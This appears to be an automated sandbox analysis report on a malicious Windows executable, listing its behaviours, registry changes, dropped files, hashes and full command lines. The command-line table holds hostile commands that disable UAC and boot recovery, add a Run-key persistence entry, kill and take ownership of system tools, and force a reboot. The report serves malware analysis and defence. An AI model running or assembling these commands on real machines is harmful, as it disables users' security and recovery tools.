Analysis Overview
SHA256: 4c291a0e441b43a6d0bb77f5038ca736276e735196349abb6e9d4c7cc3fd4dc5
Threat Level: Known bad
The file TERESPAIR.exe was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Modifies boot configuration data using bcdedit
Possible privilege escalation attempt
Modifies file permissions
Modifies system executable filetype association
Adds Run key to start application
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Modifies registry class
Modifies data under HKEY_USERS
Kills process with taskkill
Analysis: static1
Detonation Overview
Reported: 2024-07-01 02:21
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted: 2024-07-01 02:21
Reported: 2024-07-01 02:22
Platform: win11-20240508-en
Max time kernel: 5s
Max time network: 8s
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5767.tmp\\SKULL.ico" | C:\Windows\system32\reg.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\death.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5767.tmp\\death.exe" | C:\Windows\system32\reg.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\System32\mmc.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\mmc.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\System32\UserAccountControlSettings.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\System32\chkdsk.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\chkdsk.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\taskmgr.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\System32\taskkill.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\taskkill.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\UserAccountControlSettings.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\System32\taskmgr.exe | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\regedit.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\regedit.exe | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "24" | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5767.tmp\\SKULL.ico" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5767.tmp\\SKULL.ico" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| --- | --- |
| C:\Users\Admin\AppData\Local\Temp\TERESPAIR.exe | "C:\Users\Admin\AppData\Local\Temp\TERESPAIR.exe" |
| C:\Windows\system32\cmd.exe | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5767.tmp\5768.tmp\5769.bat C:\Users\Admin\AppData\Local\Temp\TERESPAIR.exe" |
| C:\Windows\system32\bcdedit.exe | bcdedit /set {default} recoveryenabled No |
| C:\Windows\system32\reg.exe | reg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v Arrow /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\cursor.cur" /f |
| C:\Windows\system32\reg.exe | reg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v Hand /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\cursor.cur" /f |
| C:\Windows\system32\reg.exe | reg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v AppStarting /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\cursor.cur" /f |
| C:\Windows\system32\reg.exe | reg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v Wait /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\cursor.cur" /f |
| C:\Windows\system32\reg.exe | reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /ve /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\SKULL.ico" /f |
| C:\Windows\system32\reg.exe | reg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /ve /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\SKULL.ico" /f |
| C:\Windows\system32\reg.exe | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f |
| C:\Windows\system32\reg.exe | reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v death.exe /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\death.exe" /f |
| C:\Windows\system32\reg.exe | reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\bg.jpg" /f |
| C:\Windows\system32\reg.exe | reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f |
| C:\Windows\system32\taskkill.exe | taskkill /f /im regedit.exe |
| C:\Windows\system32\taskkill.exe | taskkill /f /im taskmgr.exe |
| C:\Windows\system32\taskkill.exe | taskkill /f /im mmc.exe |
| C:\Windows\system32\takeown.exe | takeown /f "C:\Windows\regedit.exe" |
| C:\Windows\system32\icacls.exe | icacls "C:\Windows\regedit.exe" /grant everyone:F |
| C:\Windows\system32\takeown.exe | takeown /f "C:\Windows\System32\taskmgr.exe" |
| C:\Windows\system32\icacls.exe | icacls "C:\Windows\System32\taskmgr.exe" /grant everyone:F |
| C:\Windows\system32\takeown.exe | takeown /f "C:\Windows\System32\taskkill.exe" |
| C:\Windows\system32\icacls.exe | icacls "C:\Windows\System32\taskkill.exe" /grant everyone:F |
| C:\Windows\system32\takeown.exe | takeown /f "C:\Windows\System32\mmc.exe" |
| C:\Windows\system32\icacls.exe | icacls "C:\Windows\System32\mmc.exe" /grant everyone:F |
| C:\Windows\system32\takeown.exe | takeown /f "C:\Windows\System32\UserAccountControlSettings.exe" |
| C:\Windows\system32\icacls.exe | icacls "C:\Windows\System32\UserAccountControlSettings.exe" /grant everyone:F |
| C:\Windows\system32\takeown.exe | takeown /f "C:\Windows\System32\chkdsk.exe" |
| C:\Windows\system32\icacls.exe | icacls "C:\Windows\System32\chkdsk.exe" /grant everyone:F |
| C:\Windows\system32\shutdown.exe | shutdown /r /t 0 |
| C:\Windows\system32\LogonUI.exe | "LogonUI.exe" /flags:0x4 /state0:0xa3a12055 /state1:0x41c64e6d |
Network
Files
C:\Users\Admin\AppData\Local\Temp\5767.tmp\5768.tmp\5769.bat
| Hash | Value |
| --- | --- |
| MD5 | 8894013652db082fb9a4ce91bf40222f |
| SHA1 | d79e5f5f4984ea0f2648b6155feecf3d786767e5 |
| SHA256 | c3914537fd001edc8d9d9d6497cbd942de5b478d391a00ca07f86af017c62359 |
| SHA512 | 94c3587a6d141d8e1b7f3e1b49173e65b1c51f327f5e676ee7a072384ee0fec0ed4f56a67704dbf7ad254aa16ba75490da018a9591cb5326deb317a21ae604f9 |
C:\Users\Admin\AppData\Local\Temp\5767.tmp\popups.exe
| Hash | Value |
| --- | --- |
| MD5 | d7f63114aade341d8a3f6924cdfa182a |
| SHA1 | ebf02b5fc29dde742321f2bc5bf80575907d7daf |
| SHA256 | 1e6d2f793b52c9099dea1c94bb97e1e4e10683ef588cf090a82781c67779ebeb |
| SHA512 | 763d369c0002b64436f74b89ffd1879f9390445713634b73e3fd3fe40ba57373efa86d0c102d79571b5f21f2ce972475517b716c7567b3fcb1fc225e94de51a5 |
C:\Users\Admin\Desktop\OPENME5.txt
| Hash | Value |
| --- | --- |
| MD5 | 4207e6b2edf7d32f4ffa65b257b84598 |
| SHA1 | 44b173829cb9a85997ebc1e9184080534404b5ff |
| SHA256 | 4ded9a36558a18aaf67f9cddc11e60ad4f8f45230a50626fdb60de7ee1ff0f4c |
| SHA512 | c4deaeb10de42d997b6fda00ff2266ee41ebb9b901043a9e6f106b166d6a2559acb9329a4ff4b611c4c6bf08662dd2461248118f5076ade34357f18973213954 |